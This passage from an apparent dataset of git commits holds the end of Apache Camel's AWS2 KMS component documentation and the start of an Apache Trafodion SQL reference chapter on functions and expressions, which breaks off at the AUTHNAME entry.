AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\n\n\nRequired KMS component options\n\nYou have to provide the amazonKmsClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/kms\/[Amazon KMS] service.\n\n== Usage\n\n=== Message headers evaluated by the KMS producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsKMSLimit` |`Integer` |The limit number of keys to return while performing a listKeys operation\n\n|`CamelAwsKMSOperation` |`String` |The operation we want to perform\n\n|`CamelAwsKMSDescription` |`String` |A key description to use while performing a createKey operation\n\n|`CamelAwsKMSKeyId` |`String` |The key Id \n|=======================================================================\n\n=== KMS Producer operations\n\nCamel-AWS KMS component provides the following operation on the producer side:\n\n- listKeys\n- createKey\n- disableKey\n- scheduleKeyDeletion\n- describeKey\n- enableKey\n\n== Producer Examples\n\n- listKeys: this operation will list the available keys in KMS\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listKeys\")\n .to(\"aws2-kms:\/\/test?kmsClient=#amazonKmsClient&operation=listKeys\")\n--------------------------------------------------------------------------------\n\n== Automatic detection of KmsClient client in registry\n\nThe component is capable of detecting the presence of an KmsClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\n== Using a POJO as body\n\nSometimes build an AWS Request can be complex, because of multiple options. 
We introduce the possibility to use a POJO as body.\nIn AWS KMS there are multiple operations you can submit, as an example for List keys request, you can do something like:\n\n------------------------------------------------------------------------------------------------------\nfrom(\"direct:createUser\")\n .setBody(ListKeysRequest.builder().limit(10).build())\n .to(\"aws2-kms:\/\/test?kmsClient=#amazonKmsClient&operation=listKeys&pojoRequest=true\")\n------------------------------------------------------------------------------------------------------\n\nIn this way you'll pass the request directly without the need of passing headers and options specifically related to this operation.\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-kms<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\ninclude::camel-spring-boot::page$aws2-kms-starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b82c05b2ea9ca454c5abcccb6c4efa81b5221d52","subject":"[TRAFODION-2379] update sql reference manual about group_concat function","message":"[TRAFODION-2379] update sql reference manual about group_concat function\n","repos":"mashengchen\/incubator-trafodion,rlugojr\/incubator-trafodion,rlugojr\/incubator-trafodion,rlugojr\/incubator-trafodion,mashengchen\/incubator-trafodion,rlugojr\/incubator-trafodion,mashengchen\/incubator-trafodion,rlugojr\/incubator-trafodion,rlugojr\/incubator-trafodion,mashengchen\/incubator-trafodion,rlugojr\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,rlugojr\/incubator-trafodion,rlugojr\/incubator-trafodion,rlugojr\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion","old_file":"docs\/sql_reference\/src\/asciidoc\/_chapters\/sql_functions_and_expressions.adoc","new_file":"docs\/sql_reference\/src\/asciidoc\/_chapters\/sql_functions_and_expressions.adoc","new_contents":"\/\/\/\/\r\n\/**\r\n* @@@ START COPYRIGHT @@@\r\n*\r\n* Licensed to the Apache Software Foundation (ASF) under one\r\n* or more contributor license agreements. See the NOTICE file\r\n* distributed with this work for additional information\r\n* regarding copyright ownership. The ASF licenses this file\r\n* to you under the Apache License, Version 2.0 (the\r\n* \"License\"); you may not use this file except in compliance\r\n* with the License. You may obtain a copy of the License at\r\n*\r\n* http:\/\/www.apache.org\/licenses\/LICENSE-2.0\r\n*\r\n* Unless required by applicable law or agreed to in writing,\r\n* software distributed under the License is distributed on an\r\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\r\n* KIND, either express or implied. See the License for the\r\n* specific language governing permissions and limitations\r\n* under the License.\r\n*\r\n* @@@ END COPYRIGHT @@@\r\n*\/\r\n\/\/\/\/\r\n\r\n[[sql_functions_and_expressions]]\r\n= SQL Functions and Expressions\r\n\r\nThis section describes the syntax and semantics of specific functions\r\nand expressions that you can use in {project-name} SQL statements. 
The\r\nfunctions and expressions are categorized according to their\r\nfunctionality.\r\n\r\n[[standard_normalization]]\r\n== Standard Normalization\r\n\r\nFor datetime functions, the definition of standard normalization is: If\r\nthe ending day of the resulting date is invalid, the day will be rounded\r\nDOWN to the last day of the result month.\r\n\r\n== Aggregate (Set) Functions\r\n\r\nAn aggregate (or set) function operates on a group or groups of rows\r\nretrieved by the SELECT statement or the subquery in which the aggregate\r\nfunction appears.\r\n\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<avg_function,AVG Function>> | Computes the average of a group of numbers derived from the evaluation\r\nof the expression argument of the function.\r\n| <<count_function,COUNT Function>> | Counts the number of rows that result from a query (by using\r\n*) or the number of rows that contain a distinct value in the one-column\r\ntable derived from the expression argument of the function (optionally\r\ndistinct values).\r\n| <<group_concat_function,GROUP_CONCAT Function>> | Returns a string result with the concatenated non-NULL\r\nvalues from a group.\r\n| <<max_function,MAX\/MAXIMUM Function>> | Determines a maximum value from the group of values derived from the\r\nevaluation of the expression argument.\r\n| <<min_function,MIN Function>> | Determines a minimum value from the group of values derived from the\r\nevaluation of the expression argument.\r\n| <<stddev_function,STDDEV Function>> | Computes the statistical standard deviation of a group of numbers\r\nderived from the evaluation of the expression argument of the function.\r\nThe numbers can be weighted.\r\n| <<sum_function,SUM Function>> | Computes the sum of a group of numbers derived from the evaluation of\r\nthe expression argument of the function.\r\n| <<variance_function,VARIANCE Function>> | Computes the statistical variance of a group of numbers derived from the\r\nevaluation of the expression argument of the function. The numbers can\r\nbe weighted.\r\n|===\r\n\r\n\r\nColumns and expressions can be arguments of an aggregate function. The\r\nexpressions cannot contain aggregate functions or subqueries.\r\n\r\nAn aggregate function can accept an argument specified as DISTINCT,\r\nwhich eliminates duplicate values before the aggregate function is\r\napplied. See <<distinct_aggregate_functions,DISTINCT Aggregate Functions>>.\r\n\r\nIf you include a GROUP BY clause in the SELECT statement, the columns\r\nyou refer to in the select list must be either grouping columns or\r\narguments of an aggregate function.
If you do not include\r\na GROUP BY clause but you specify an aggregate function in the select\r\nlist, all rows of the SELECT result table form the one and only group.\r\n\r\nSee the individual entry for the function.\r\n\r\n[[character_string_functions]]\r\n== Character String Functions\r\n\r\nThese functions manipulate character strings and use a character value\r\nexpression as an argument or return a result of a character data type.\r\nCharacter string functions treat each single-byte or multi-byte character\r\nin an input string as one character, regardless of the byte length of\r\nthe character.\r\n\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<ascii_function,ASCII Function>> | Returns the ASCII code value of the first character of a character value\r\nexpression.\r\n| <<char_function,CHAR Function>> | Returns the specified code value in a character set.\r\n| <<char_length_function,CHAR_LENGTH Function>> | Returns the number of characters in a string. You can also use\r\nCHARACTER_LENGTH.\r\n| <<code_value_function,CODE_VALUE Function>> | Returns an unsigned integer that is the code point of the first\r\ncharacter in a character value expression that can be associated with\r\none of the supported character sets.\r\n| <<concat_function,CONCAT Function>> | Returns the concatenation of two character value expressions as a string\r\nvalue. You can also use the concatenation operator (\\|\\|).\r\n| <<insert_function,INSERT Function>> | Returns a character string where a specified number of characters within\r\nthe character string have been deleted and then a second character\r\nstring has been inserted at a specified start position.\r\n| <<lcase_function,LCASE Function>> | Down-shifts alphanumeric characters. You can also use LOWER.\r\n| <<left_function,LEFT Function>> | Returns the leftmost specified number of characters from a character expression.\r\n| <<locate_function,LOCATE Function>> | Returns the position of a specified substring within a character string.\r\nYou can also use POSITION.\r\n| <<lower_function,LOWER Function>> | Down-shifts alphanumeric characters. 
You can also use LCASE.\r\n| <<lpad_function,LPAD Function>> | Replaces the leftmost specified number of characters in a character\r\nexpression with a padding character.\r\n| <<ltrim_function,LTRIM Function>> | Removes leading spaces from a character string.\r\n| <<octet_length_function,OCTET_LENGTH Function>> | Returns the length of a character string in bytes.\r\n| <<position_function,POSITION Function>> | Returns the position of a specified substring within a character string.\r\nYou can also use LOCATE.\r\n| <<repeat_function,REPEAT Function>> | Returns a character string composed of the evaluation of a character\r\nexpression repeated a specified number of times.\r\n| <<replace_function,REPLACE Function>> | Returns a character string where all occurrences of a specified\r\ncharacter string in the original string are replaced with another\r\ncharacter string.\r\n| <<right_function,RIGHT Function>> | Returns the rightmost specified number of characters from a character\r\nexpression.\r\n| <<rpad_function,RPAD Function>> | Replaces the rightmost specified number of characters in a character\r\nexpression with a padding character.\r\n| <<rtrim_function,RTRIM Function>> | Removes trailing spaces from a character string.\r\n| <<space_function,SPACE Function>> | Returns a character string consisting of a specified number of spaces.\r\n| <<substring_function,SUBSTRING\/SUBSTR Function>> | Extracts a substring from a character string.\r\n| <<translate_function,TRANSLATE Function>> | Translates a character string from a source character set to a target\r\ncharacter set.\r\n| <<trim_function,TRIM Function>> | Removes leading or trailing characters from a character string.\r\n| <<ucase_function,UCASE Function>> | Up-shifts alphanumeric characters. You can also use UPSHIFT or UPPER.\r\n| <<upper_function,UPPER Function>> | Up-shifts alphanumeric characters. You can also use UPSHIFT or UCASE.\r\n| <<upshift_function,UPSHIFT Function>> | Up-shifts alphanumeric characters. You can also use UPPER or UCASE.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n[[datetime_functions]]\r\n== Datetime Functions\r\n\r\nThese functions use either a datetime value expression as an argument or\r\nreturn a result of datetime data type:\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<add_months_function,ADD_MONTHS Function>> | Adds the integer number of months specified by _int_expr_\r\nto _datetime_expr_ and normalizes the result.\r\n| <<converttimestamp_function,CONVERTTIMESTAMP Function>> | Converts a Julian timestamp to a TIMESTAMP value.\r\n| <<current_function,CURRENT Function>> | Returns the current timestamp. You can also use the\r\n<<current_timestamp_function,CURRENT_TIMESTAMP Function>>.\r\n| <<current_date_function,CURRENT_DATE Function>> | Returns the current date.\r\n| <<current_time_function,CURRENT_TIME Function>> | Returns the current time.\r\n| <<current_timestamp_function,CURRENT_TIMESTAMP Function>> | Returns the current timestamp.
You can also use the <<current_function,CURRENT Function>>.\r\n| <<date_add_function,DATE_ADD Function>> | Adds the interval specified by _interval_expression_\r\nto _datetime_expr_.\r\n| <<date_part_function_of_an_interval,DATE_PART Function (of an Interval)>> | Extracts the datetime field specified by _text_ from the interval value\r\nspecified by interval and returns the result as an exact numeric value.\r\n| <<date_part_function_of_a_timestamp,DATE_PART Function (of a Timestamp)>> | Extracts the datetime field specified by _text_ from the datetime value\r\nspecified by timestamp and returns the result as an exact numeric value.\r\n| <<date_sub_function,DATE_SUB Function>> | Subtracts the specified _interval_expression_ from\r\n_datetime_expr._\r\n| <<date_trunc_function,DATE_TRUNC Function>> | Returns the date with the time portion of the day truncated.\r\n| <<dateadd_function,DATEADD Function>> | Adds the interval specified by _datepart_ and _num_expr_\r\nto _datetime_expr_.\r\n| <<datediff_function,DATEDIFF Function>> | Returns the integer value for the number of _datepart_ units of time\r\nbetween _startdate_ and _enddate_.\r\n| <<dateformat_function,DATEFORMAT Function>> | Formats a datetime value for display purposes.\r\n| <<day_function,DAY Function>> | Returns an integer value in the range 1 through 31 that represents the\r\ncorresponding day of the month. You can also use DAYOFMONTH.\r\n| <<dayname_function,DAYNAME Function>> | Returns the name of the day of the week from a date or timestamp\r\nexpression.\r\n| <<dayofmonth_function,DAYOFMONTH Function>> | Returns an integer value in the range 1 through 31 that represents the\r\ncorresponding day of the month. You can also use DAY.\r\n| <<dayofweek_function,DAYOFWEEK Function>> | Returns an integer value in the range 1 through 7 that represents the\r\ncorresponding day of the week.\r\n| <<dayofyear_function,DAYOFYEAR Function>> | Returns an integer value in the range 1 through 366 that represents the\r\ncorresponding day of the year.\r\n| <<extract_function,EXTRACT Function>> | Returns a specified datetime field from a datetime value expression or\r\nan interval value expression.\r\n| <<hour_function,HOUR Function>> | Returns an integer value in the range 0 through 23 that represents the\r\ncorresponding hour of the day.\r\n| <<juliantimestamp_function,JULIANTIMESTAMP Function>> | Converts a datetime value to a Julian timestamp.\r\n| <<minute_function,MINUTE Function>> | Returns an integer value in the range 0 through 59 that represents the\r\ncorresponding minute of the hour.\r\n| <<month_function,MONTH Function>> | Returns an integer value in the range 1 through 12 that represents the\r\ncorresponding month of the year.\r\n| <<monthname_function,MONTHNAME Function>> | Returns a character literal that is the name of the month of the year\r\n(January, February, and so on).\r\n| <<quarter_function,QUARTER Function>> | Returns an integer value in the range 1 through 4 that represents the\r\ncorresponding quarter of the year.\r\n| <<second_function,SECOND Function>> | Returns an integer value in the range 0 through 59 that represents the\r\ncorresponding second of the minute.\r\n| <<timestampadd_function,TIMESTAMPADD Function>> | Adds the interval of time specified by _interval-ind_ and\r\n_num_expr_ to _datetime_expr_.\r\n| <<timestampdiff_function,TIMESTAMPDIFF Function>> | Returns the integer value for the number of _interval-ind_\r\nunits of time between _startdate_ and _enddate_.\r\n| <<week_function,WEEK Function>> | Returns 
an integer value in the range 1 through 54 that represents the\r\ncorresponding week of the year.\r\n| <<year_function,YEAR Function>> | Returns an integer value that represents the year.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n[[mathematical_functions]]\r\n== Mathematical Functions\r\n\r\nUse these mathematical functions within an SQL numeric value expression:\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<abs_function,ABS Function>> | Returns the absolute value of a numeric value expression. \r\n| <<acos_function,ACOS Function>> | Returns the arccosine of a numeric value expression as an angle expressed in radians.\r\n| <<asin_function,ASIN Function>> | Returns the arcsine of a numeric value expression as an angle expressed in radians.\r\n| <<atan_function,ATAN Function>> | Returns the arctangent of a numeric value expression as an angle expressed in radians.\r\n| <<atan2_function,ATAN2 Function>> | Returns the arctangent of the x and y coordinates, specified by two numeric value expressions, as an angle expressed in radians.\r\n| <<ceiling_function,CEILING Function>> | Returns the smallest integer greater than or equal to a numeric value expression.\r\n| <<cos_function,COS Function>> | Returns the cosine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<crc32_function,CRC32 Function>> | Returns CRC32 checksum\r\n| <<cosh_function,COSH Function>> | Returns the hyperbolic cosine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<degrees_function,DEGREES Function>> | Converts a numeric value expression expressed in radians to the number of degrees.\r\n| <<exp_function,EXP Function>> | Returns the exponential value (to the base e) of a numeric value expression.\r\n| <<floor_function,FLOOR Function>> | Returns the largest integer less than or equal to a numeric value expression.\r\n| <<log_function,LOG Function>> | Returns the natural logarithm of a numeric value expression.\r\n| <<log10_function,LOG10 Function>> | Returns the base 10 logarithm of a numeric value expression.\r\n| <<mod_function,MOD Function>> | Returns the remainder (modulus) of an integer value expression divided by an integer value expression.\r\n| <<nullifzero_function,NULLIFZERO Function>> | Returns the value of the operand unless it is zero, in which case it returns NULL.\r\n| <<pi_function,PI Function>> | Returns the constant value of pi as a floating-point value.\r\n| <<power_function,POWER Function>> | Returns the value of a numeric value expression raised to the power of an integer value expression. You can also use the exponential operator \\*\\*.\r\n| <<radians_function,RADIANS Function>> | Converts a numeric value expression expressed in degrees to the number of radians.\r\n| <<round_function,ROUND Function>> | Returns the value of _numeric_expr_ round to _num_ places to the right of the decimal point.\r\n| <<sign_function,SIGN Function>> | Returns an indicator of the sign of a numeric value expression. If value is less than zero, returns -1 as the indicator. If value is zero,\r\nreturns 0. 
If value is greater than zero, returns 1.\r\n| <<sin_function,SIN Function>> | Returns the sine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<sinh_function,SINH Function>> | Returns the hyperbolic sine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<sqrt_function,SQRT Function>> | Returns the square root of a numeric value expression.\r\n| <<tan_function,TAN Function>> | Returns the tangent of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<tanh_function,TANH Function>> | Returns the hyperbolic tangent of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<zeroifnull_function,ZEROIFNULL Function>> | Returns the value of the operand unless it is NULL, in which case it returns zero.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n[[encryption_functions]]\r\n== Encryption Functions\r\n\r\nUse these functions within an SQL value expression to do data encryption or hashing:\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<md5_function,MD5 Function>> | Returns MD5 checksum\r\n| <<sha_function,SHA Function>> | Returns SHA-1 160-bit checksum\r\n| <<sha2_function,SHA2 Function>> | Returns SHA-2 checksum\r\n|===\r\n\r\n[[sequence_functions]]\r\n== Sequence Functions\r\n\r\nSequence functions operate on ordered rows of the intermediate result\r\ntable of a SELECT statement that includes a SEQUENCE BY clause. Sequence\r\nfunctions are categorized generally as difference, moving, offset, or\r\nrunning.\r\n\r\nSome sequence functions, such as ROWS SINCE, require sequentially\r\nexamining every row in the history buffer until the result is computed.\r\nExamining a large history buffer in this manner for a condition that has\r\nnot been true for many rows could be an expensive operation.
In\r\naddition, such operations may not be parallelized because the entire\r\nsorted result set must be available to compute the result of the\r\nsequence function.\r\n\r\n[[difference_sequence_functions]]\r\n=== Difference sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<diff1_function,DIFF1 Function>> | Calculates differences between values of a column expression in the current row and previous rows.\r\n| <<diff2_function,DIFF2 Function>> | Calculates differences between values of the result of DIFF1 of the current row and DIFF1 of previous rows.\r\n|===\r\n\r\n[[moving_sequence_functions]]\r\n=== Moving sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<movingcount_function,MOVINGCOUNT Function>> | Returns the number of non-null values of a column expression in the current window.\r\n| <<movingmax_function,MOVINGMAX Function>> | Returns the maximum of non-null values of a column expression in the current window.\r\n| <<movingmin_function,MOVINGMIN Function>> | Returns the minimum of non-null values of a column expression in the current window.\r\n| <<movingstddev_function,MOVINGSTDDEV Function>> | Returns the standard deviation of non-null values of a column expression in the current window.\r\n| <<movingsum_function,MOVINGSUM Function>> | Returns the sum of non-null values of a column expression in the current window.\r\n| <<movingvariance_function,MOVINGVARIANCE Function>> | Returns the variance of non-null values of a column expression in the current window.\r\n|===\r\n\r\n[[offset_sequence_function]]\r\n=== Offset sequence function\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<offset_function,OFFSET Function>> | Retrieves columns from previous rows.\r\n|===\r\n\r\n<<<\r\n[[running_sequence_functions]]\r\n=== Running sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<runningavg_function,RUNNINGAVG Function>> | Returns the average of non-null values of a column expression up to and including the current row.\r\n| <<runningcount_function,RUNNINGCOUNT Function>> | Returns the number of rows up to and including the current row.\r\n| <<runningmax_function,RUNNINGMAX Function>> | Returns the maximum of values of a column expression up to and including the current row.\r\n| <<runningmin_function,RUNNINGMIN Function>> | Returns the minimum of values of a column expression up to and including the current row.\r\n| <<runningrank_function,RUNNINGRANK Function>> | Returns the rank of the given value of an intermediate result table ordered by a SEQUENCE BY clause in a SELECT statement.\r\n| <<runningstddev_function,RUNNINGSTDDEV Function>> | Returns the standard deviation of non-null values of a column expression up to and including the current row.\r\n| <<runningsum_function,RUNNINGSUM Function>> | Returns the sum of non-null values of a column expression up to and including the current row.\r\n| <<runningvariance_function,RUNNINGVARIANCE Function>> | Returns the variance of non-null values of a column expression up to and including the current row.\r\n|===\r\n\r\n[[other_sequence_functions]]\r\n=== Other sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<lastnotnull_function,LASTNOTNULL Function>> | Returns the last non-null value for the specified column expression.
If only null values have been returned, returns null.\r\n| <<rows_since_function,ROWS SINCE Function>> | Returns the number of rows counted since the specified condition was last true.\r\n| <<rows_since_changed_function,ROWS SINCE CHANGED Function>> | Returns the number of rows counted since the specified set of values last changed.\r\n| <<this_function,THIS Function>> | Used in ROWS SINCE to distinguish between the value of the column in the current row and the value of the column in previous rows.\r\n|===\r\n\r\nSee <<sequence_by_clause,SEQUENCE BY Clause>> and the individual entry for each function.\r\n\r\n<<<\r\n[[other_functions_and_expressions]]\r\n== Other Functions and Expressions\r\n\r\nUse these other functions and expressions in an SQL value expression:\r\n\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<authname_function,AUTHNAME Function>> | Returns the authorization name associated with the specified authorization ID number.\r\n| <<bitand_function,BITAND Function>> | Performs 'and' operation on corresponding bits of the two operands.\r\n| <<case_expression,CASE (Conditional) Expression>> | A conditional expression. The two forms of the CASE expression are simple and searched.\r\n| <<cast_expression,CAST Expression>> | Converts a value from one data type to another data type that you specify.\r\n| <<coalesce_function,COALESCE Function>> | Returns the value of the first expression in the list that does not have a NULL value or if all \r\nthe expressions have NULL values, the function returns a NULL value.\r\n| <<converttohex_function,CONVERTTOHEX Function>> | Converts the specified value expression to hexadecimal for display purposes.\r\n| <<current_user_function,CURRENT_USER Function>> | Returns the database user name of the current user who invoked the function.\r\n| <<decode_function,DECODE Function>> | Compares _expr_ to each _test_expr_ value one by one in the order provided.\r\n| <<explain_function,EXPLAIN Function>> | Generates a result table describing an access plan for a SELECT, INSERT, DELETE, or UPDATE statement.\r\n| <<isnull_function,ISNULL Function>> | Returns the first argument if it is not null, otherwise it returns the second argument.\r\n| <<is_ipv4_function, IS_IPV4 Function>> | Returns 1 if the argument is a valid IPv4 address specified as a string, 0 otherwise.\r\n| <<is_ipv6_function, IS_IPV6 Function>> | Returns 1 if the argument is a valid IPv6 address specified as a string, 0 otherwise.\r\n| <<inet_aton_function, INET_ATON Function>> | Given the dotted-quad representation of an IPv4 network address as a string, returns an integer that represents the numeric value of the address in network byte order (big endian). INET_ATON() returns NULL if it does not understand its argument.\r\n| <<inet_ntoa_function, INET_NTOA Function>> | Given a numeric IPv4 network address in network byte order, returns the dotted-quad string representation of the address as a nonbinary string in the connection character set. 
INET_NTOA() returns NULL if it does not understand its argument.\r\n| <<nullif_function,NULLIF Function>> | Returns the value of the first operand if the two operands are not equal, otherwise it returns NULL.\r\n| <<nvl_function,NVL Function>> | Returns the value of the first operand unless it is NULL, in which case it returns the value of the second operand.\r\n| <<user_function,USER Function>> | Returns either the database user name of the current user who invoked the function or the database user name\r\nassociated with the specified user ID number.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n<<<\r\n[[abs_function]]\r\n== ABS Function\r\n\r\nThe ABS function returns the absolute value of a numeric value\r\nexpression. ABS is a {project-name} SQL extension.\r\n\r\n```\r\nABS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ABS function. The result is returned as an unsigned\r\nnumeric value if the precision of the argument is less than 10 or as a\r\nLARGEINT if the precision of the argument is greater than or equal to\r\n10. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_abs]]\r\n=== Examples of ABS\r\n\r\n* This function returns the value 8:\r\n+\r\n```\r\nABS (-20 + 12)\r\n```\r\n\r\n<<<\r\n[[acos_function]]\r\n== ACOS Function\r\n\r\nThe ACOS function returns the arccosine of a numeric value expression as\r\nan angle expressed in radians.\r\n\r\nACOS is a {project-name} SQL extension.\r\n\r\n```\r\nACOS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ACOS function. The range for the value of the argument is\r\nfrom -1 to +1. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_acos]]\r\n=== Examples of ACOS\r\n\r\n* The ACOS function returns the value 3.49044274380724416E-001 or\r\napproximately 0.3491 in radians (which is 20 degrees).\r\n+\r\n```\r\nACOS (0.9397)\r\n```\r\n\r\n* This function returns the value 0.3491. The function ACOS is the\r\ninverse of the function COS.\r\n+\r\n```\r\nACOS (COS (0.3491))\r\n```\r\n\r\n<<<\r\n[[add_months_function]]\r\n== ADD_MONTHS Function\r\n\r\nThe ADD_MONTHS function adds the integer number of months specified by\r\n_int_expr_ to _datetime_expr_ and normalizes the result. ADD_MONTHS is a {project-name} SQL\r\nextension.\r\n\r\n```\r\nADD_MONTHS (datetime_expr, int_expr [, int2 ])\r\n```\r\n\r\n* `_datetime_expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. The return value is the same type as the _datetime_expr_. See\r\n<<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `_int_expr_`\r\n+\r\nis an SQL numeric value expression of data type SMALLINT or INTEGER that\r\nspecifies the number of months. See <<numeric_value_expressions,\r\nNumeric Value Expressions>>.\r\n\r\n* `_int2_`\r\n+\r\nis an unsigned integer constant. If _int2_ is omitted or is the literal\r\n0, the normalization is the standard normalization. If _int2_ is the\r\nliteral 1, the normalization includes the standard normalization and if\r\nthe starting day (the day part of _datetime_expr_) is the last day of\r\nthe starting month, then the ending day (the day part of the result\r\nvalue) is set to the last valid day of the result month. See\r\n<<standard_normalization,Standard Normalization>>.
See\r\n<<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_add_months]]\r\n=== Examples of ADD_MONTHS\r\n\r\n* This function returns the value DATE '2007-03-31':\r\n+\r\n```\r\nADD_MONTHS(DATE '2007-02-28', 1, 1)\r\n```\r\n\r\n* This function returns the value DATE '2007-03-28':\r\n+\r\n```\r\nADD_MONTHS(DATE '2007-02-28', 1, 0)\r\n```\r\n\r\n* This function returns the value DATE '2008-03-28':\r\n+\r\n```\r\nADD_MONTHS(DATE '2008-02-28', 1, 1)\r\n```\r\n\r\n* This function returns the timestamp '2009-02-28 00:00:00':\r\n+\r\n```\r\nADD_MONTHS(timestamp'2008-02-29 00:00:00',12,1)\r\n```\r\n\r\n<<<\r\n[[ascii_function]]\r\n== ASCII Function\r\n\r\nThe ASCII function returns the integer that is the ASCII code of the\r\nfirst character in a character string expression associated with either\r\nthe ISO88591 character set or the UTF8 character set.\r\n\r\nASCII is a {project-name} SQL extension.\r\n\r\n```\r\nASCII (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_ascii]]\r\n=== Considerations for ASCII\r\n\r\nFor a string expression in the UTF8 character set, if the value of the\r\nfirst byte in the string is greater than 127, {project-name} SQL returns this\r\nerror message:\r\n\r\n```\r\nERROR[8428] The argument to function ASCII is not valid.\r\n```\r\n\r\n[[examples_of_ascii]]\r\n=== Examples of ASCII\r\n\r\n* Select the column JOBDESC and return the ASCII code of the first\r\ncharacter of the job description:\r\n+\r\n```\r\nSELECT jobdesc, ASCII (jobdesc) FROM persnl.job;\r\n\r\nJOBDESC (EXPR)\r\n----------------- --------\r\nMANAGER 77\r\nPRODUCTION SUPV 80\r\nASSEMBLER 65\r\nSALESREP 83\r\n... ...\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[asin_function]]\r\n== ASIN Function\r\n\r\nThe ASIN function returns the arcsine of a numeric value expression as\r\nan angle expressed in radians.\r\n\r\nASIN is a {project-name} SQL extension.\r\n\r\n```\r\nASIN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ASIN function. The range for the value of the argument is\r\nfrom -1 to +1. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_asin]]\r\n=== Examples of ASIN\r\n\r\n* This function returns the value 3.49044414403046400e-001 or\r\napproximately 0.3491 in radians (which is 20 degrees):\r\n+\r\n```\r\nASIN(0.3420)\r\n```\r\n\r\n* This function returns the value 0.3491. The function ASIN is the\r\ninverse of the function SIN.\r\n+\r\n```\r\nASIN(SIN(0.3491))\r\n```\r\n\r\n<<<\r\n[[atan_function]]\r\n== ATAN Function\r\n\r\nThe ATAN function returns the arctangent of a numeric value expression\r\nas an angle expressed in radians.\r\n\r\nATAN is a {project-name} SQL extension.\r\n\r\n```\r\nATAN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ATAN function. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_atan]]\r\n=== Examples of ATAN\r\n\r\n* This function returns the value 8.72766423249958272E-001 or\r\napproximately 0.8727 in radians (which is 50 degrees):\r\n+\r\n```\r\nATAN (1.192)\r\n```\r\n\r\n* This function returns the value 0.8727. The function ATAN is the\r\ninverse of the function TAN.\r\n+\r\n```\r\nATAN (TAN (0.8727))\r\n```\r\n\r\n<<<\r\n[[atan2_function]]\r\n== ATAN2 Function\r\n\r\nThe ATAN2 function returns the arctangent of the x and y coordinates,\r\nspecified by two numeric value expressions, as an angle expressed in\r\nradians.\r\n\r\nATAN2 is a {project-name} SQL extension.\r\n\r\n```\r\nATAN2 (numeric-expression-x,numeric-expression-y)\r\n```\r\n\r\n* `_numeric-expression-x_, _numeric-expression-y_`\r\n+\r\nare SQL numeric value expressions that specify the value for the x and y\r\ncoordinate arguments of the ATAN2 function. See\r\n<<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_atan2]]\r\n=== Examples of ATAN2\r\n\r\n* This function returns the value 2.66344329881899520E+000, or\r\napproximately 2.6634:\r\n+\r\n```\r\nATAN2 (1.192,-2.3)\r\n```\r\n\r\n<<<\r\n[[authname_function]]\r\n== AUTHNAME Function\r\n\r\nThe AUTHNAME function returns the name of 